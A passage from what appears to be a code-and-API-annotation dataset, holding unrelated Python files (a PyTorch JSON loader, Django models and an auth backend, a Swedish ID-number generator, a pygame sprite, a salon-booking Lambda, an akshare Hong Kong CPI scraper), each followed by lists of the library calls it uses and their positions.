pickle.dump(Gf, handle, protocol=pickle.HIGHEST_PROTOCOL)
|
[
"seaborn.set_style",
"pickle.dump",
"timeit.default_timer",
"pickle.load",
"seaborn.distplot",
"networkx.write_gexf"
] |
[((822, 829), 'timeit.default_timer', 'timer', ([], {}), '()\n', (827, 829), True, 'from timeit import default_timer as timer\n'), ((1444, 1469), 'seaborn.set_style', 'sns.set_style', (['"""darkgrid"""'], {}), "('darkgrid')\n", (1457, 1469), True, 'import seaborn as sns\n'), ((1484, 1500), 'seaborn.distplot', 'sns.distplot', (['vu'], {}), '(vu)\n', (1496, 1500), True, 'import seaborn as sns\n'), ((1851, 1876), 'seaborn.set_style', 'sns.set_style', (['"""darkgrid"""'], {}), "('darkgrid')\n", (1864, 1876), True, 'import seaborn as sns\n'), ((1891, 1906), 'seaborn.distplot', 'sns.distplot', (['v'], {}), '(v)\n', (1903, 1906), True, 'import seaborn as sns\n'), ((2244, 2347), 'networkx.write_gexf', 'nx.write_gexf', (['Guf', "(datapath + path_graphs + db_name_table + 'NetworkGraphPeople' + tag +\n '_f.gexf')"], {}), "(Guf, datapath + path_graphs + db_name_table +\n 'NetworkGraphPeople' + tag + '_f.gexf')\n", (2257, 2347), True, 'import networkx as nx\n'), ((2496, 2599), 'networkx.write_gexf', 'nx.write_gexf', (['Gf', "(datapath + path_graphs + db_name_table + 'NetworkGraphDPeople' + tag +\n '_f.gexf')"], {}), "(Gf, datapath + path_graphs + db_name_table +\n 'NetworkGraphDPeople' + tag + '_f.gexf')\n", (2509, 2599), True, 'import networkx as nx\n'), ((949, 968), 'pickle.load', 'pickle.load', (['handle'], {}), '(handle)\n', (960, 968), False, 'import pickle\n'), ((1066, 1085), 'pickle.load', 'pickle.load', (['handle'], {}), '(handle)\n', (1077, 1085), False, 'import pickle\n'), ((1172, 1191), 'pickle.load', 'pickle.load', (['handle'], {}), '(handle)\n', (1183, 1191), False, 'import pickle\n'), ((2431, 2489), 'pickle.dump', 'pickle.dump', (['Guf', 'handle'], {'protocol': 'pickle.HIGHEST_PROTOCOL'}), '(Guf, handle, protocol=pickle.HIGHEST_PROTOCOL)\n', (2442, 2489), False, 'import pickle\n'), ((2684, 2741), 'pickle.dump', 'pickle.dump', (['Gf', 'handle'], {'protocol': 'pickle.HIGHEST_PROTOCOL'}), '(Gf, handle, protocol=pickle.HIGHEST_PROTOCOL)\n', (2695, 2741), False, 'import pickle\n')]
|
import json
import os
from torch.utils.data import Dataset
from tools.dataset_tool import dfs_search
class JsonFromFilesDataset(Dataset):
def __init__(self, config, mode, encoding="utf8", *args, **params):
self.config = config
self.mode = mode
self.file_list = []
self.data_path = config.get("data", "%s_data_path" % mode)
self.encoding = encoding
filename_list = config.get("data", "%s_file_list" % mode).replace(" ", "").split(",")
recursive = config.getboolean("data", "recursive")
for name in filename_list:
self.file_list = self.file_list + dfs_search(os.path.join(self.data_path, name), recursive)
self.file_list.sort()
self.load_mem = config.getboolean("data", "load_into_mem")
self.json_format = config.get("data", "json_format")
if self.load_mem:
self.data = []
for filename in self.file_list:
if self.json_format == "single":
self.data = self.data + json.load(open(filename, "r", encoding=encoding))
else:
f = open(filename, "r", encoding=encoding)
for line in f:
self.data.append(json.loads(line))
else:
self.total = 0
self.prefix_file_cnt = []
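            # prefix_file_cnt[i] holds the cumulative number of records in
            # files 0..i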
if self.json_format == "single":
self.temp_data = {
"data": json.load(open(self.file_list[0], "r", encoding=encoding)),
"file_id": 0
}
else:
self.temp_file_list = []
for filename in self.file_list:
if self.json_format == "single":
data = json.load(open(filename, "r", encoding=encoding))
self.prefix_file_cnt.append(len(data))
else:
f = open(filename, "r", encoding=encoding)
cnt = 0
for line in f:
cnt += 1
f.close()
self.temp_file_list.append({
"file": open(filename, "r", encoding=encoding),
"cnt": 0
})
self.prefix_file_cnt.append(cnt)
for a in range(1, len(self.prefix_file_cnt)):
self.prefix_file_cnt[a] += self.prefix_file_cnt[a - 1]
self.total = self.prefix_file_cnt[-1]
def get_file_id(self, item):
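        # binary search over the cumulative counts for the file that
        # contains global record index `item`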
l = 0
r = len(self.prefix_file_cnt)
while l + 1 != r:
m = (l + r) // 2
if self.prefix_file_cnt[m-1] <= item:
l = m
else:
r = m
return l
def __getitem__(self, item):
if self.load_mem:
return self.data[item]
else:
which = self.get_file_id(item)
if which == 0:
idx = item
else:
idx = item - self.prefix_file_cnt[which - 1]
if self.json_format == "single":
if self.temp_data["file_id"] != which:
self.temp_data = {
"data": json.load(open(self.file_list[which], "r", encoding=self.encoding)),
"file_id": 0
}
return self.temp_data["data"][idx]
else:
if self.temp_file_list[which]["cnt"] > idx:
self.temp_file_list[which] = {
"file": open(self.file_list[which], "r", encoding=self.encoding),
"cnt": 0
}
delta = idx - self.temp_file_list[which]["cnt"]
                for _ in range(delta):
                    self.temp_file_list[which]["file"].readline()
data = json.loads(self.temp_file_list[which]["file"].readline())
self.temp_file_list[which]["cnt"] = idx + 1
return data
def __len__(self):
if self.load_mem:
return len(self.data)
else:
return self.total
|
[
"os.path.join",
"json.loads"
] |
[((642, 676), 'os.path.join', 'os.path.join', (['self.data_path', 'name'], {}), '(self.data_path, name)\n', (654, 676), False, 'import os\n'), ((1250, 1266), 'json.loads', 'json.loads', (['line'], {}), '(line)\n', (1260, 1266), False, 'import json\n')]
|
from django.db import models
class Cases(models.Model):
'''
Example Case:
{
"age": "",
"asset_id": "",
"assigned_user_id": "19x91",
"billable_time": "",
"billing_service": "",
"case_no": "CC21063",
"casechannel": "",
"casepriority": "Medium",
"casestatus": "Open",
"cf_1152": "",
"cf_cases_autocommunicate": "1",
"cf_cases_awaitingfeedback": "0",
"contact_id": "4x316167",
"created_user_id": "19x93",
"createdtime": "2020-11-25 18:26:04",
"current_state_entry_time": "2020-11-25 18:59:55",
"customer_reply": "0",
"deferred_date": "",
"description": "Video needed in FMS for Truck 20",
"email": "",
"first_response_actualon": "",
"first_response_expectedon": "2020-11-30 16:26:00",
"first_response_status": "Time Left",
"from_portal": "0",
"group_id": "20x5",
"id": "39x916810",
"impact_area": "",
"impact_type": "",
"is_billable": "0",
"is_billed": "0",
"isclosed": "0",
"last_responded_on": "",
"modifiedby": "19x6",
"modifiedtime": "2020-11-25 19:03:26",
"parent_id": "3x220302",
"product_id": "",
"rate": "",
"reassign_count": "0",
"reopen_count": "0",
"resolution": "",
"resolution_time": "0.000",
"resolution_type": "",
"satisfaction_feedback": "",
"satisfaction_index": "",
"servicecontract_id": "",
"servicelocation": "",
"servicetype": "",
"sla_actual_closureon": "",
"sla_closureon": "2020-12-10 17:26:00",
"slaid": "38x9",
"slastatus": "Running",
"source": "CRM",
"starred": "",
"tags": "",
"time_spent": "0.594",
"title": "Video needed in FMS for Truck 20",
"total_time": "0",
"wait_count": "",
"work_location": "",
"assigned_username" = "Bradley Spenkins",
"assigned_groupname" = "Tech Support",
},
'''
assigned_user_id = models.CharField(max_length=50)
modifiedby = models.CharField(max_length=50, default='')
case_no = models.CharField(max_length=50)
casestatus = models.CharField(max_length=50)
contact_id = models.CharField(max_length=50)
created_user_id = models.CharField(max_length=50)
createdtime = models.DateTimeField()
group_id = models.CharField(max_length=50)
case_id = models.CharField(max_length=50)
case_url_id = models.CharField(max_length=50, default='')
modifiedtime = models.DateTimeField()
title = models.CharField(max_length=250)
time_spent = models.CharField(max_length=50)
time_spent_hr = models.CharField(max_length=75)
assigned_username = models.CharField(max_length=75)
modified_username = models.CharField(max_length=75, default='')
assigned_groupname = models.CharField(max_length=75)
satisfaction_feedback = models.CharField(max_length=250, default='')
satisfaction_index = models.CharField(max_length=50, default='')
case_resolved = models.DateTimeField(null=True)
date_created = models.DateTimeField(auto_now_add=True)
date_modified = models.DateTimeField(auto_now=True)
def __str__(self):
return f'{self.assigned_groupname} - {self.assigned_username} - {self.case_no} - {self.date_modified.strftime("%Y-%m-%d %H:%M:%S")}'
def modifiedtime_date(self):
return self.modifiedtime.strftime('%Y-%m-%d')
|
[
"django.db.models.CharField",
"django.db.models.DateTimeField"
] |
[((2198, 2229), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2214, 2229), False, 'from django.db import models\n'), ((2247, 2290), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'default': '""""""'}), "(max_length=50, default='')\n", (2263, 2290), False, 'from django.db import models\n'), ((2305, 2336), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2321, 2336), False, 'from django.db import models\n'), ((2354, 2385), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2370, 2385), False, 'from django.db import models\n'), ((2403, 2434), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2419, 2434), False, 'from django.db import models\n'), ((2457, 2488), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2473, 2488), False, 'from django.db import models\n'), ((2507, 2529), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (2527, 2529), False, 'from django.db import models\n'), ((2545, 2576), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2561, 2576), False, 'from django.db import models\n'), ((2591, 2622), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2607, 2622), False, 'from django.db import models\n'), ((2641, 2684), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'default': '""""""'}), "(max_length=50, default='')\n", (2657, 2684), False, 'from django.db import models\n'), ((2702, 2733), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2718, 2733), False, 'from django.db import models\n'), ((2753, 2775), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (2773, 2775), False, 'from django.db import models\n'), ((2788, 2820), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(250)'}), '(max_length=250)\n', (2804, 2820), False, 'from django.db import models\n'), ((2838, 2869), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)'}), '(max_length=50)\n', (2854, 2869), False, 'from django.db import models\n'), ((2890, 2921), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(75)'}), '(max_length=75)\n', (2906, 2921), False, 'from django.db import models\n'), ((2946, 2977), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(75)'}), '(max_length=75)\n', (2962, 2977), False, 'from django.db import models\n'), ((3002, 3045), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(75)', 'default': '""""""'}), "(max_length=75, default='')\n", (3018, 3045), False, 'from django.db import models\n'), ((3071, 3102), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(75)'}), '(max_length=75)\n', (3087, 3102), False, 'from django.db import models\n'), ((3131, 3175), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(250)', 'default': '""""""'}), "(max_length=250, default='')\n", (3147, 3175), False, 'from django.db import models\n'), ((3201, 3244), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(50)', 'default': '""""""'}), "(max_length=50, default='')\n", (3217, 3244), False, 'from django.db import 
models\n'), ((3265, 3296), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)'}), '(null=True)\n', (3285, 3296), False, 'from django.db import models\n'), ((3316, 3355), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (3336, 3355), False, 'from django.db import models\n'), ((3376, 3411), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)'}), '(auto_now=True)\n', (3396, 3411), False, 'from django.db import models\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Creates a valid national identification number for
Sweden (personal identity number, called personnummer in swedish)
http://sv.wikipedia.org/wiki/Personnummer_i_Sverige
http://en.wikipedia.org/wiki/Personal_identity_number_%28Sweden%29
"""
from random import randint
from datetime import datetime, timedelta
def get_random_date_of_birth():
age = (randint(18, 65) * 365) + randint(-182, 182)
date = datetime.now() - timedelta(days=age)
y = date.year
m = date.month
d = date.day
return "".join(["{0:{fill}{width}}".format(x, fill=0, width=2) for x in [y, m, d]])
def get_random_number_of_birth():
n = randint(1, 999)
n = "{0:{fill}{width}}".format(n, fill=0, width=3)
return n
def get_control_digit(date_of_birth, number_of_birth):
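    # Luhn algorithm: weight the digits alternately by 2 and 1, then sum
    # every digit of the resulting products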
factor = 2
digits = ""
for n in date_of_birth + number_of_birth:
digits += str(int(n) * factor)
factor = 1 if factor == 2 else 2
sum = 0
for n in digits:
sum += int(n)
control_digit = 10 - (sum % 10)
control_digit = control_digit if control_digit < 10 else 0
return str(control_digit)
def get_punctuation_for_date(date):
year = int(date[:4])
age = datetime.now().year - year
return "-" if age < 100 else "+"
if __name__ == '__main__':
import sys
date_of_birth = get_random_date_of_birth()
number_of_birth = get_random_number_of_birth()
if len(sys.argv) == 2:
param = sys.argv[1]
if '-' in param:
date_of_birth, number_of_birth = param.split('-')
if len(number_of_birth) == 4:
number_of_birth = number_of_birth[:3]
else:
date_of_birth = param
if len(date_of_birth) != 8:
raise ValueError('Use yyyymmdd format')
control_digit = get_control_digit(date_of_birth[2:],
number_of_birth)
punctuation = get_punctuation_for_date(date_of_birth)
print("".join([date_of_birth,
punctuation,
number_of_birth,
control_digit]))
# vi: set fileencoding=utf-8 :
|
[
"datetime.datetime.now",
"random.randint",
"datetime.timedelta"
] |
[((682, 697), 'random.randint', 'randint', (['(1)', '(999)'], {}), '(1, 999)\n', (689, 697), False, 'from random import randint\n'), ((429, 447), 'random.randint', 'randint', (['(-182)', '(182)'], {}), '(-182, 182)\n', (436, 447), False, 'from random import randint\n'), ((459, 473), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (471, 473), False, 'from datetime import datetime, timedelta\n'), ((476, 495), 'datetime.timedelta', 'timedelta', ([], {'days': 'age'}), '(days=age)\n', (485, 495), False, 'from datetime import datetime, timedelta\n'), ((404, 419), 'random.randint', 'randint', (['(18)', '(65)'], {}), '(18, 65)\n', (411, 419), False, 'from random import randint\n'), ((1240, 1254), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1252, 1254), False, 'from datetime import datetime, timedelta\n')]
|
#!/usr/bin/env python2
import math
import pygame
from random import random
import pygame.sprite
from pygame import Rect
from pygame import Surface
import lib.GameWorld
from lib.Colors import Colors
from lib.CachedAsset import load_cached_asset
# Class representing an obstacle between the fluid pools
class Obstacle(pygame.sprite.Sprite):
Y_VARIABILITY = 10
Y_BIAS_MULT = 1.8
def __init__(self, width, height):
super(Obstacle, self).__init__()
self.obstacletxt = load_cached_asset("assets/img/obstacle4.png")
        self.create(width, height)
def create(self, width, height):
# Sculpt a obstacle into a surface (width w, height w), initially
# a solid block, by subtracting from each pixel column, in the
# left hand side and right hand side of the rect separately.
# YVAR is the maximum variability from a straight diagonal
# line (to either side), Y_BIAS_MULT determines how flat-
# topped the obstacles are. Returns the surface.
sfc = Surface((width, height))
        self.rect = sfc.get_rect()
self.rect.bottom = lib.GameWorld.GameWorld.GAME_HEIGHT
lhs, rhs = self.splitRectVertically(Rect(0, 0, width, height))
drop_per_x = float(rhs.height) / rhs.width
        YVAR = self.Y_VARIABILITY
        Y_BIAS_MULT = self.Y_BIAS_MULT
sfc.blit(self.obstacletxt, (0, 0))
sfc.set_colorkey(Colors.GREEN)
# Generate obstacle
for side in (lhs, rhs):
last_y = -1
startx = side.left
i_mult = 1
if (side == lhs):
startx = side.right-1
i_mult = -1
for i in xrange(side.width):
x = startx+(i*i_mult)
y = side.top + i*drop_per_x
reverse_progress = ((1.0 - float(i) / side.width) * 100 + 1)
reverse_progress_log = math.log(reverse_progress, 100)
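                # the log-scaled bias removes less material near the centre
                # (i == 0), leaving a flat-topped peak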
ybias = -reverse_progress_log * YVAR * Y_BIAS_MULT
yjitter = (YVAR - random()*YVAR*2 + ybias)
y = round(y + yjitter)
if (y < last_y):
y = last_y
last_y = y
sfc.fill(Colors.GREEN, Rect(x, side.top, 1, y-side.top))
        self.image = sfc
def splitRectVertically(self, rect):
lhs = Rect(rect.left, rect.top, rect.centerx-rect.left, rect.height)
rhs = Rect(rect.centerx, rect.top, rect.right-rect.centerx, rect.height)
return (lhs, rhs)
def draw(self, surface, x):
self.rect.left = x
surface.blit(self.image, self.rect)
|
[
"pygame.Surface",
"lib.CachedAsset.load_cached_asset",
"pygame.Rect",
"random.random",
"math.log"
] |
[((475, 520), 'lib.CachedAsset.load_cached_asset', 'load_cached_asset', (['"""assets/img/obstacle4.png"""'], {}), "('assets/img/obstacle4.png')\n", (492, 520), False, 'from lib.CachedAsset import load_cached_asset\n'), ((964, 988), 'pygame.Surface', 'Surface', (['(width, height)'], {}), '((width, height))\n', (971, 988), False, 'from pygame import Surface\n'), ((1984, 2048), 'pygame.Rect', 'Rect', (['rect.left', 'rect.top', '(rect.centerx - rect.left)', 'rect.height'], {}), '(rect.left, rect.top, rect.centerx - rect.left, rect.height)\n', (1988, 2048), False, 'from pygame import Rect\n'), ((2055, 2123), 'pygame.Rect', 'Rect', (['rect.centerx', 'rect.top', '(rect.right - rect.centerx)', 'rect.height'], {}), '(rect.centerx, rect.top, rect.right - rect.centerx, rect.height)\n', (2059, 2123), False, 'from pygame import Rect\n'), ((1115, 1140), 'pygame.Rect', 'Rect', (['(0)', '(0)', 'width', 'height'], {}), '(0, 0, width, height)\n', (1119, 1140), False, 'from pygame import Rect\n'), ((1640, 1671), 'math.log', 'math.log', (['reverse_progress', '(100)'], {}), '(reverse_progress, 100)\n', (1648, 1671), False, 'import math\n'), ((1882, 1916), 'pygame.Rect', 'Rect', (['x', 'side.top', '(1)', '(y - side.top)'], {}), '(x, side.top, 1, y - side.top)\n', (1886, 1916), False, 'from pygame import Rect\n'), ((1749, 1757), 'random.random', 'random', ([], {}), '()\n', (1755, 1757), False, 'from random import random\n')]
|
import sys
import os
import re
import getpass
import datetime
import subprocess
import pandas as pd
# mf packages
# TODO - remove this dependency if opensource
try:
from mf_file_utilities import applauncher_wrapper as aw
except:
pass
def get_user():
return getpass.getuser()
def date():
return datetime.datetime.now().strftime('%Y%m%d')
# extracted from mf_modules ##################################
# from mf_modules.file_operations import open_file
def open_file(filename):
"""Open document with default application in Python."""
if sys.platform == 'linux' and str(type(aw))== "<class 'module'>":
aw.open_file(filename)
# note. this is an MF custom App for opening folders and files
# from a Linux file server on the local network
else:
try:
os.startfile(filename)
except AttributeError:
subprocess.call(['open', filename])
# from mf_modules.file_operations import jobno_fromdir
def jobno_fromdir(fdir):
'''
returns the job number from a given file directory
Args:
fdir (filepath): file-directory
Returns:
job associated to file-directory
Code:
re.findall("[J][0-9][0-9][0-9][0-9]", txt)
'''
matches = re.findall("[J][0-9][0-9][0-9][0-9]", fdir)
if len(matches) == 0:
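        # fall back to a placeholder job number when the directory has none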
job_no = 'J4321'
else:
job_no = matches[0]
return job_no
##############################################################
def xlsxtemplated_check(fpth):
from openpyxl import load_workbook
wb = load_workbook(fpth)
if wb.properties.keywords is not None and 'xlsxtemplater' in wb.properties.keywords:
return True
else:
return False
def from_excel(fpth):
"""
reads back in pandas tables that have been output using xlsxtemplater.to_excel
Args:
fpth(str): xl fpth
Returns:
li(list): of the format below
li = {'sheet_name':'name','description':'dataframe description','df':'pd.DataFrame'}
"""
if not xlsxtemplated_check(fpth):
print('{} --> not created by xlsxtemplater'.format(fpth))
return None
cols = ['sheet_name','description']
df_readme = pd.read_excel(fpth,sheet_name='readme')
li = []
for index, row in df_readme.iterrows():
tmp = row.to_dict()
tmp['df'] = pd.read_excel(fpth,sheet_name=row.sheet_name)
li.append(tmp)
return li
|
[
"getpass.getuser",
"openpyxl.load_workbook",
"pandas.read_excel",
"re.findall",
"mf_file_utilities.applauncher_wrapper.open_file",
"datetime.datetime.now",
"os.startfile"
] |
[((264, 281), 'getpass.getuser', 'getpass.getuser', ([], {}), '()\n', (279, 281), False, 'import getpass\n'), ((1259, 1302), 're.findall', 're.findall', (['"""[J][0-9][0-9][0-9][0-9]"""', 'fdir'], {}), "('[J][0-9][0-9][0-9][0-9]', fdir)\n", (1269, 1302), False, 'import re\n'), ((1553, 1572), 'openpyxl.load_workbook', 'load_workbook', (['fpth'], {}), '(fpth)\n', (1566, 1572), False, 'from openpyxl import load_workbook\n'), ((2201, 2241), 'pandas.read_excel', 'pd.read_excel', (['fpth'], {'sheet_name': '"""readme"""'}), "(fpth, sheet_name='readme')\n", (2214, 2241), True, 'import pandas as pd\n'), ((630, 652), 'mf_file_utilities.applauncher_wrapper.open_file', 'aw.open_file', (['filename'], {}), '(filename)\n', (642, 652), True, 'from mf_file_utilities import applauncher_wrapper as aw\n'), ((2345, 2391), 'pandas.read_excel', 'pd.read_excel', (['fpth'], {'sheet_name': 'row.sheet_name'}), '(fpth, sheet_name=row.sheet_name)\n', (2358, 2391), True, 'import pandas as pd\n'), ((306, 329), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (327, 329), False, 'import datetime\n'), ((823, 845), 'os.startfile', 'os.startfile', (['filename'], {}), '(filename)\n', (835, 845), False, 'import os\n')]
|
import logging
import json
import os
from datetime import datetime
from common import (common_const, utils)
from validation import hair_salon_param_check as validation
from hair_salon.hair_salon_staff_reservation import HairSalonStaffReservation
# environment variables
HAIR_SALON_STAFF_RESERVATION_DB = os.environ.get("HAIR_SALON_STAFF_RESERVATION_DB") # noqa 501
LOGGER_LEVEL = os.environ.get("LOGGER_LEVEL")
# logging configuration
logger = logging.getLogger()
if LOGGER_LEVEL == 'DEBUG':
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
# initialize the table-access controller
staff_reservation_table_controller = HairSalonStaffReservation()
def get_staff_calendar(params):
"""
    Fetch the staff member's reservation info from the DB, judge whether
    each day still has an opening, and return the result.
    Params
    -------
    params:dict
        Request parameters sent from the front end.
    Returns
    -------
    return_calendar:dict
        List of {column name: value} entries.
"""
    # fetch the requested month's availability for the given staff ID from the DB
staff_calendar = staff_reservation_table_controller.query_index_staff_id_reserved_year_month( # noqa501
int(params['staffId']), params['preferredYearMonth']
)
course_minutes = int(params['courseMinutes'])
    # the calendar returns only data within the requested month
return_calendar = {'calendarYearMonth': params['preferredYearMonth']}
return_calendar['calendarDays'] = []
for staff_reservation_info in staff_calendar:
        # check that the course's treatment time fits within the staff
        # member's longest available slot
reservable_time_term = int(
staff_reservation_info['reservableTimeTerm'])
if reservable_time_term < course_minutes:
vacancy_flg = 0
else:
vacancy_flg = 1
reserved_day = datetime.strptime(
staff_reservation_info['reservedDay'], '%Y-%m-%d')
return_day = reserved_day.day
return_calendar['calendarDays'].append({'day': int(return_day),
'vacancyFlg': vacancy_flg})
return return_calendar
def lambda_handler(event, context):
"""
    Return the staff member's day-by-day availability.
    Parameters
    ----------
    event : dict
        Request parameters sent from the front end.
    context : dict
        Lambda context.
    Returns
    -------
    return_calendar : dict
        Day-by-day availability (a vacancy flag is returned only for days
        that have reservations).
"""
    # log and validate the request parameters
logger.info(event)
req_param = event['queryStringParameters']
if req_param is None:
error_msg_display = common_const.const.MSG_ERROR_NOPARAM
return utils.create_error_response(error_msg_display, 400)
param_checker = validation.HairSalonParamCheck(req_param) # noqa 501
if error_msg := param_checker.check_api_staff_calendar_get():
error_msg_display = ('\n').join(error_msg)
logger.error(error_msg_display)
return utils.create_error_response(error_msg_display, 400)
try:
        # fetch the staff member's availability for the requested month by staff ID
staff_calendar = get_staff_calendar(req_param)
except Exception as e:
logger.exception('Occur Exception: %s', e)
return utils.create_error_response('Error')
body = json.dumps(
staff_calendar,
default=utils.decimal_to_int,
ensure_ascii=False)
return utils.create_success_response(body)
|
[
"common.utils.create_success_response",
"hair_salon.hair_salon_staff_reservation.HairSalonStaffReservation",
"validation.hair_salon_param_check.HairSalonParamCheck",
"json.dumps",
"os.environ.get",
"datetime.datetime.strptime",
"common.utils.create_error_response",
"logging.getLogger"
] |
[((288, 337), 'os.environ.get', 'os.environ.get', (['"""HAIR_SALON_STAFF_RESERVATION_DB"""'], {}), "('HAIR_SALON_STAFF_RESERVATION_DB')\n", (302, 337), False, 'import os\n'), ((365, 395), 'os.environ.get', 'os.environ.get', (['"""LOGGER_LEVEL"""'], {}), "('LOGGER_LEVEL')\n", (379, 395), False, 'import os\n'), ((415, 434), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (432, 434), False, 'import logging\n'), ((592, 619), 'hair_salon.hair_salon_staff_reservation.HairSalonStaffReservation', 'HairSalonStaffReservation', ([], {}), '()\n', (617, 619), False, 'from hair_salon.hair_salon_staff_reservation import HairSalonStaffReservation\n'), ((2414, 2455), 'validation.hair_salon_param_check.HairSalonParamCheck', 'validation.HairSalonParamCheck', (['req_param'], {}), '(req_param)\n', (2444, 2455), True, 'from validation import hair_salon_param_check as validation\n'), ((2935, 3011), 'json.dumps', 'json.dumps', (['staff_calendar'], {'default': 'utils.decimal_to_int', 'ensure_ascii': '(False)'}), '(staff_calendar, default=utils.decimal_to_int, ensure_ascii=False)\n', (2945, 3011), False, 'import json\n'), ((3048, 3083), 'common.utils.create_success_response', 'utils.create_success_response', (['body'], {}), '(body)\n', (3077, 3083), False, 'from common import common_const, utils\n'), ((1575, 1643), 'datetime.datetime.strptime', 'datetime.strptime', (["staff_reservation_info['reservedDay']", '"""%Y-%m-%d"""'], {}), "(staff_reservation_info['reservedDay'], '%Y-%m-%d')\n", (1592, 1643), False, 'from datetime import datetime\n'), ((2341, 2392), 'common.utils.create_error_response', 'utils.create_error_response', (['error_msg_display', '(400)'], {}), '(error_msg_display, 400)\n', (2368, 2392), False, 'from common import common_const, utils\n'), ((2640, 2691), 'common.utils.create_error_response', 'utils.create_error_response', (['error_msg_display', '(400)'], {}), '(error_msg_display, 400)\n', (2667, 2691), False, 'from common import common_const, utils\n'), ((2886, 2922), 'common.utils.create_error_response', 'utils.create_error_response', (['"""Error"""'], {}), "('Error')\n", (2913, 2922), False, 'from common import common_const, utils\n')]
|
import nox
@nox.session(python=False)
def tests(session):
session.run('poetry', 'install')
session.run('poetry', 'run', 'pytest')
|
[
"nox.session"
] |
[((14, 39), 'nox.session', 'nox.session', ([], {'python': '(False)'}), '(python=False)\n', (25, 39), False, 'import nox\n')]
|
from django.contrib.auth.backends import ModelBackend
from django.contrib.auth.models import User
from salt_observer.saltapis import SaltCherrypy, SaltTornado
class RestBackend(ModelBackend):
''' Authenticate against salt-api-permissions '''
def authenticate(self, username=None, password=None, request=None):
try:
cherrypy_token = SaltCherrypy(username, password).token
tornado_token = SaltTornado(username, password).token
        except Exception:
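            # any failure talking to the salt APIs is treated as a failed login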
cherrypy_token = False
tornado_token = False
if cherrypy_token and tornado_token:
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
user = User.objects.create_user(username=username, email='', password=password)
request.session['salt_cherrypy_token'] = cherrypy_token
request.session['salt_tornado_token'] = tornado_token
return user
return None
|
[
"salt_observer.saltapis.SaltCherrypy",
"salt_observer.saltapis.SaltTornado",
"django.contrib.auth.models.User.objects.get",
"django.contrib.auth.models.User.objects.create_user"
] |
[((365, 397), 'salt_observer.saltapis.SaltCherrypy', 'SaltCherrypy', (['username', 'password'], {}), '(username, password)\n', (377, 397), False, 'from salt_observer.saltapis import SaltCherrypy, SaltTornado\n'), ((432, 463), 'salt_observer.saltapis.SaltTornado', 'SaltTornado', (['username', 'password'], {}), '(username, password)\n', (443, 463), False, 'from salt_observer.saltapis import SaltCherrypy, SaltTornado\n'), ((656, 691), 'django.contrib.auth.models.User.objects.get', 'User.objects.get', ([], {'username': 'username'}), '(username=username)\n', (672, 691), False, 'from django.contrib.auth.models import User\n'), ((753, 825), 'django.contrib.auth.models.User.objects.create_user', 'User.objects.create_user', ([], {'username': 'username', 'email': '""""""', 'password': 'password'}), "(username=username, email='', password=password)\n", (777, 825), False, 'from django.contrib.auth.models import User\n')]
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Date: 2021/12/6 15:21
Desc: China - Hong Kong - macro indicators
https://data.eastmoney.com/cjsj/foreign_8_0.html
"""
import pandas as pd
import requests
from akshare.utils import demjson
def macro_china_hk_cpi() -> pd.DataFrame:
"""
    Eastmoney - economic data - China (Hong Kong) - consumer price index
    https://data.eastmoney.com/cjsj/foreign_8_0.html
    :return: consumer price index
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
"js": "({data:[(x)],pages:(pc)})",
"p": "1",
"ps": "2000",
"mkt": "8",
"stat": "0",
"pageNo": "1",
"pageNum": "1",
"_": "1621332091873",
}
r = requests.get(url, params=params)
data_text = r.text
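    # drop the outer parentheses of the JSONP-style payload before decoding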
data_json = demjson.decode(data_text[1:-1])
temp_df = pd.DataFrame([item.split(",") for item in data_json["data"]])
temp_df.columns = [
"ๆถ้ด",
"ๅๅผ",
"็ฐๅผ",
"ๅๅธๆฅๆ",
]
temp_df['ๅๅผ'] = pd.to_numeric(temp_df['ๅๅผ'])
temp_df['็ฐๅผ'] = pd.to_numeric(temp_df['็ฐๅผ'])
temp_df['ๆถ้ด'] = pd.to_datetime(temp_df['ๆถ้ด']).dt.date
temp_df['ๅๅธๆฅๆ'] = pd.to_datetime(temp_df['ๅๅธๆฅๆ']).dt.date
return temp_df
def macro_china_hk_cpi_ratio() -> pd.DataFrame:
"""
    Eastmoney - economic data - China (Hong Kong) - consumer price index YoY
    https://data.eastmoney.com/cjsj/foreign_8_1.html
    :return: consumer price index YoY
:rtype: pandas.DataFrame
"""
url = "https://datainterface.eastmoney.com/EM_DataCenter/JS.aspx"
params = {
"type": "GJZB",
"sty": "HKZB",
